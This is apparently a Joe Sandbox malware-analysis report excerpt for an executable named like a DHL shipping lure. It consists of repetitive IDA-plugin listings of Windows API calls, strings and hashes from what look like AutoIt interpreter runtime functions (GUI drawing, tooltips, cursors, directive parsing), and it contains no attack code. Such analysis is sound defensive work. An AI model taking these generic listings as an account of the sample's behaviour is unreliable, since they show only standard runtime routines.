                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveType
                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                    • API String ID: 2907320926-4222207086
                                                                                    • Opcode ID: de7bdf55b74781c2cee82bb25c5f5a9f482d8ffc2db955fe0ced8264d611233c
                                                                                    • Instruction ID: 1ba8c9e3fbb8395aa34fc7f566c0ab269ccf8e15b6a551cd335cb3a61836e5de
                                                                                    • Opcode Fuzzy Hash: de7bdf55b74781c2cee82bb25c5f5a9f482d8ffc2db955fe0ced8264d611233c
                                                                                    • Instruction Fuzzy Hash: 3051AEB064A209EB8B18DB50D942DFD73A8FF48714B204157E81AE72D1CE35DD86EB43
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                    • API String ID: 1038674560-86951937
                                                                                    • Opcode ID: 57624353ada72777d8e2ccf960f2d36ce3176848ca6fea17c57712757f8108d7
                                                                                    • Instruction ID: 52eb2f68faa121805aa5adc2ce71b5f206ba2719d04b33d4af58399f04fb9510
                                                                                    • Opcode Fuzzy Hash: 57624353ada72777d8e2ccf960f2d36ce3176848ca6fea17c57712757f8108d7
                                                                                    • Instruction Fuzzy Hash: 5D8105B0600205EACF20BB61DC86FFE7768FF15710F044029FA05AA296EB7CDA55D6A1
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00839AD2
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00839B8B
                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00839BA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: 0
                                                                                    • API String ID: 2326795674-4108050209
                                                                                    • Opcode ID: 2ddfd07a3555888a30a1257ec8cc2d98b6186f9b85ddf82e1dfb56fd72accc78
                                                                                    • Instruction ID: 48ae339283f07c9d808f57366d8c2ee0790ff635bd40940cb2d3d73095f3f4b0
                                                                                    • Opcode Fuzzy Hash: 2ddfd07a3555888a30a1257ec8cc2d98b6186f9b85ddf82e1dfb56fd72accc78
                                                                                    • Instruction Fuzzy Hash: DB02AC30504201AFDB25CF24C889BAABBE5FF89314F04892DF9D9D62A1D7B4D945CBD2
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000012), ref: 0083A903
                                                                                    • SetTextColor.GDI32(?,?), ref: 0083A907
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0083A91D
                                                                                    • GetSysColor.USER32(0000000F), ref: 0083A928
                                                                                    • CreateSolidBrush.GDI32(?), ref: 0083A92D
                                                                                    • GetSysColor.USER32(00000011), ref: 0083A945
                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0083A953
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0083A964
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0083A96D
                                                                                    • SelectObject.GDI32(?,?), ref: 0083A97A
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0083A999
                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0083A9B0
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0083A9C5
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0083A9ED
                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0083AA14
                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0083AA32
                                                                                    • DrawFocusRect.USER32(?,?), ref: 0083AA3D
                                                                                    • GetSysColor.USER32(00000011), ref: 0083AA4B
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0083AA53
                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0083AA67
                                                                                    • SelectObject.GDI32(?,0083A5FA), ref: 0083AA7E
                                                                                    • DeleteObject.GDI32(?), ref: 0083AA89
                                                                                    • SelectObject.GDI32(?,?), ref: 0083AA8F
                                                                                    • DeleteObject.GDI32(?), ref: 0083AA94
                                                                                    • SetTextColor.GDI32(?,?), ref: 0083AA9A
                                                                                    • SetBkColor.GDI32(?,?), ref: 0083AAA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 1996641542-0
                                                                                    • Opcode ID: 4aa8a4d02ef71e25fc64189ee81ab7fd3618d3153958f1a69adcd9143dbbfafc
                                                                                    • Instruction ID: 7c0b8289e934e96e127b7ba0410b04638b6a42f40858a4d947db344b9589d7a0
                                                                                    • Opcode Fuzzy Hash: 4aa8a4d02ef71e25fc64189ee81ab7fd3618d3153958f1a69adcd9143dbbfafc
                                                                                    • Instruction Fuzzy Hash: 4F511B71D00208FFDF119FA4DC49EAE7B79FB88320F114625FA11AB2A2D7759940DB90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00838AC1
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00838AD2
                                                                                    • CharNextW.USER32(0000014E), ref: 00838B01
                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00838B42
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00838B58
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00838B69
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00838B86
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00838BD8
                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00838BEE
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00838C1F
                                                                                    • _memset.LIBCMT ref: 00838C44
                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00838C8D
                                                                                    • _memset.LIBCMT ref: 00838CEC
                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00838D16
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00838D6E
                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00838E1B
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00838E3D
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00838E87
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00838EB4
                                                                                    • DrawMenuBar.USER32(?), ref: 00838EC3
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00838EEB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                    • String ID: 0
                                                                                    • API String ID: 1073566785-4108050209
                                                                                    • Opcode ID: 2b7f7ecdfdeb05beea4939a3401f96cdb5a7516d634dc285eb98cf2b5f4c7000
                                                                                    • Instruction ID: bf97b96818950d83a8bbf5c40a230d0d0c4425b812d6cadbf346d4b5c516dabd
                                                                                    • Opcode Fuzzy Hash: 2b7f7ecdfdeb05beea4939a3401f96cdb5a7516d634dc285eb98cf2b5f4c7000
                                                                                    • Instruction Fuzzy Hash: D5E16DB1900318EFDB209F64CC89AEE7B79FF85710F108156FA15EA291DB748981DFA1
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 008349CA
                                                                                    • GetDesktopWindow.USER32 ref: 008349DF
                                                                                    • GetWindowRect.USER32(00000000), ref: 008349E6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00834A48
                                                                                    • DestroyWindow.USER32(?), ref: 00834A74
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00834A9D
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00834ABB
                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00834AE1
                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00834AF6
                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00834B09
                                                                                    • IsWindowVisible.USER32(?), ref: 00834B29
                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00834B44
                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00834B58
                                                                                    • GetWindowRect.USER32(?,?), ref: 00834B70
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00834B96
                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00834BB0
                                                                                    • CopyRect.USER32(?,?), ref: 00834BC7
                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00834C32
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                    • String ID: ($0$tooltips_class32
                                                                                    • API String ID: 698492251-4156429822
                                                                                    • Opcode ID: 2a950781bf4ed3b2430fb79f5996b9dfe2e6b22c644c9a86647bb6202db00bff
                                                                                    • Instruction ID: 5d5a4b2dd248df8e8fcca22cfbfd086d037308e26a67173164132348919dc7bc
                                                                                    • Opcode Fuzzy Hash: 2a950781bf4ed3b2430fb79f5996b9dfe2e6b22c644c9a86647bb6202db00bff
                                                                                    • Instruction Fuzzy Hash: 6CB17A71608350AFDB04DF64C849B6ABBE5FF88314F00891CFA9A9B2A1D775EC05CB95
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008144AC
                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008144D2
                                                                                    • _wcscpy.LIBCMT ref: 00814500
                                                                                    • _wcscmp.LIBCMT ref: 0081450B
                                                                                    • _wcscat.LIBCMT ref: 00814521
                                                                                    • _wcsstr.LIBCMT ref: 0081452C
                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00814548
                                                                                    • _wcscat.LIBCMT ref: 00814591
                                                                                    • _wcscat.LIBCMT ref: 00814598
                                                                                    • _wcsncpy.LIBCMT ref: 008145C3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                    • API String ID: 699586101-1459072770
                                                                                    • Opcode ID: 0ccfeb747358274511c8cab7d9a451fd60fd03770dca75d305a3dec2199dc064
                                                                                    • Instruction ID: dd4343811184dd1165dee9ceed9d4e769f28d2edee20ffe3c5877e9dfec35f34
                                                                                    • Opcode Fuzzy Hash: 0ccfeb747358274511c8cab7d9a451fd60fd03770dca75d305a3dec2199dc064
                                                                                    • Instruction Fuzzy Hash: E241E571A00204BBEB10AA74DC0BEFF777CEF51710F10056BF905E6283EA799A4296E5
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007B28BC
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 007B28C4
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007B28EF
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 007B28F7
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 007B291C
                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007B2939
                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007B2949
                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007B297C
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007B2990
                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 007B29AE
                                                                                    • GetStockObject.GDI32(00000011), ref: 007B29CA
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 007B29D5
                                                                                      • Part of subcall function 007B2344: GetCursorPos.USER32(?), ref: 007B2357
                                                                                      • Part of subcall function 007B2344: ScreenToClient.USER32(008757B0,?), ref: 007B2374
                                                                                      • Part of subcall function 007B2344: GetAsyncKeyState.USER32(00000001), ref: 007B2399
                                                                                      • Part of subcall function 007B2344: GetAsyncKeyState.USER32(00000002), ref: 007B23A7
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,007B1256), ref: 007B29FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                    • String ID: AutoIt v3 GUI
                                                                                    • API String ID: 1458621304-248962490
                                                                                    • Opcode ID: 9759b350ca5e27b3fb907ee69f767f99e4ff33f1b0c8acd4c568f4c7841017b0
                                                                                    • Instruction ID: 99863a024a1e27679c713953fe4a2ab5a9c1688e93ebff83921c835f1e54c4df
                                                                                    • Opcode Fuzzy Hash: 9759b350ca5e27b3fb907ee69f767f99e4ff33f1b0c8acd4c568f4c7841017b0
                                                                                    • Instruction Fuzzy Hash: B7B17E71A01209DFDB15DFA8CC49BEE7BB4FB48310F104129FA19E62A5DB78D841CB51
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0080A47A
                                                                                    • __swprintf.LIBCMT ref: 0080A51B
                                                                                    • _wcscmp.LIBCMT ref: 0080A52E
                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0080A583
                                                                                    • _wcscmp.LIBCMT ref: 0080A5BF
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0080A5F6
                                                                                    • GetDlgCtrlID.USER32(?), ref: 0080A648
                                                                                    • GetWindowRect.USER32(?,?), ref: 0080A67E
                                                                                    • GetParent.USER32(?), ref: 0080A69C
                                                                                    • ScreenToClient.USER32(00000000), ref: 0080A6A3
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0080A71D
                                                                                    • _wcscmp.LIBCMT ref: 0080A731
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0080A757
                                                                                    • _wcscmp.LIBCMT ref: 0080A76B
                                                                                      • Part of subcall function 007D362C: _iswctype.LIBCMT ref: 007D3634
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                    • String ID: %s%u
                                                                                    • API String ID: 3744389584-679674701
                                                                                    • Opcode ID: 62b05047515951be6643a0db8633d51bdce598d5cda072b299f6e81982d9ff0d
                                                                                    • Instruction ID: f03228877f0cbb47edb116222d523c4cc263220b523ba5d4906058b36243f7d0
                                                                                    • Opcode Fuzzy Hash: 62b05047515951be6643a0db8633d51bdce598d5cda072b299f6e81982d9ff0d
                                                                                    • Instruction Fuzzy Hash: 4EA1DE71204706AFDB59DF60CC88FAAB7E8FF54314F008629F9A9D2190DB30E955CB92
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0080AF18
                                                                                    • _wcscmp.LIBCMT ref: 0080AF29
                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0080AF51
                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0080AF6E
                                                                                    • _wcscmp.LIBCMT ref: 0080AF8C
                                                                                    • _wcsstr.LIBCMT ref: 0080AF9D
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0080AFD5
                                                                                    • _wcscmp.LIBCMT ref: 0080AFE5
                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0080B00C
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0080B055
                                                                                    • _wcscmp.LIBCMT ref: 0080B065
                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0080B08D
                                                                                    • GetWindowRect.USER32(00000004,?), ref: 0080B0F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                    • String ID: @$ThumbnailClass
                                                                                    • API String ID: 1788623398-1539354611
                                                                                    • Opcode ID: 76ee58f84f9ba2b163d69af6b2c1dd1865d1e36c08a126b07ff74d4e1b055ebc
                                                                                    • Instruction ID: b7d54e6031ec0ac31a5e84ea0cae7949cdd91cce35884d2d5bdd8524d37d94fc
                                                                                    • Opcode Fuzzy Hash: 76ee58f84f9ba2b163d69af6b2c1dd1865d1e36c08a126b07ff74d4e1b055ebc
                                                                                    • Instruction Fuzzy Hash: 41819C711083069BDB44DF14CC85BAA7BE8FF94314F04846AED85DA1D2DB34DD49CBA2
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                    • API String ID: 1038674560-1810252412
                                                                                    • Opcode ID: b4547288ff1101b4763709532fd115ce37812d1f67b78f52c4b4d7cbc31647d4
                                                                                    • Instruction ID: 1502d9911bee24eeec8c3cb7d1cdafe65c2fadd5dbb4365d71e07038934710b2
                                                                                    • Opcode Fuzzy Hash: b4547288ff1101b4763709532fd115ce37812d1f67b78f52c4b4d7cbc31647d4
                                                                                    • Instruction Fuzzy Hash: 15318F31948309EAEA18FAA0DD4BFEE7774FB10769F610429F411F12D1EE696F04C692
                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00825013
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0082501E
                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00825029
                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00825034
                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0082503F
                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0082504A
                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00825055
                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00825060
                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0082506B
                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00825076
                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00825081
                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0082508C
                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00825097
                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 008250A2
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 008250AD
                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 008250B8
                                                                                    • GetCursorInfo.USER32(?), ref: 008250C8
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load$Info
                                                                                    • String ID:
                                                                                    • API String ID: 2577412497-0
                                                                                    • Opcode ID: 1f584e69b915cbd8db0b6d6e597c4dc23c3260a4f736d4659f15e624f8130f3e
                                                                                    • Instruction ID: 13e6854991b5800939398185de6c09871ef68b914af1b9631ea5843fbdb37bed
                                                                                    • Opcode Fuzzy Hash: 1f584e69b915cbd8db0b6d6e597c4dc23c3260a4f736d4659f15e624f8130f3e
                                                                                    • Instruction Fuzzy Hash: B63114B1D4831D6ADF109FB69C8999EBFE8FF04750F50453AA50CE7280DA7865408F91
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0083A259
                                                                                    • DestroyWindow.USER32(?,?), ref: 0083A2D3
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0083A34D
                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0083A36F
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0083A382
                                                                                    • DestroyWindow.USER32(00000000), ref: 0083A3A4
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007B0000,00000000), ref: 0083A3DB
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0083A3F4
                                                                                    • GetDesktopWindow.USER32 ref: 0083A40D
                                                                                    • GetWindowRect.USER32(00000000), ref: 0083A414
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0083A42C
                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0083A444
                                                                                      • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                    • String ID: 0$tooltips_class32
